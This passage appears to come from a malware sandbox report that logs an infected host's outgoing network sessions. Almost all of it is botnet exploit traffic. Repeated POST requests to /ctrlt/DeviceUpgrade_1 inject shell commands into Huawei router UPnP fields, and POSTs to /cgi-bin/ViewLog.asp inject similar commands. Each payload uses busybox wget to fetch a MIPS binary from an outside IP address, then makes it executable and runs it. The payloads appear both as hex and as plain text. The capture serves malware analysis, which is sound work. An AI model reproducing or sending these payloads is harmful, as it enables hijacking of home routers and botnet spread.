2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:18.528846979 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:20.448746920 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              733192.168.2.1452240156.254.78.16537215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:16.924442053 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:21.056756020 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              734192.168.2.1439794197.3.213.25337215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:17.098301888 CET886OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:17.411258936 CET236INHTTP/1.1 500 Internal Server Error
                                              Content-Type: text/xml; charset="utf-8"
                                              Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                              EXT:
                                              Connection: Keep-Alive
                                              Content-Length: 398


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              735192.168.2.1454550156.241.82.25537215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:17.214338064 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:21.312855005 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              736192.168.2.1455468154.206.158.24923
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:17.372888088 CET221INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 38 3a 31 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:18:16Auth Result: .
                                              Nov 23, 2023 05:18:17.677333117 CET221INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 38 3a 31 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:18:16Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              737192.168.2.144045494.120.220.2238080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:17.381006002 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              738192.168.2.145866295.164.149.1248080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:17.489844084 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:17.594369888 CET1314INHTTP/1.1 400 Bad Request
                                              Server: squid/3.5.20
                                              Mime-Version: 1.0
                                              Date: Thu, 23 Nov 2023 04:18:17 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3454
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Connection: close
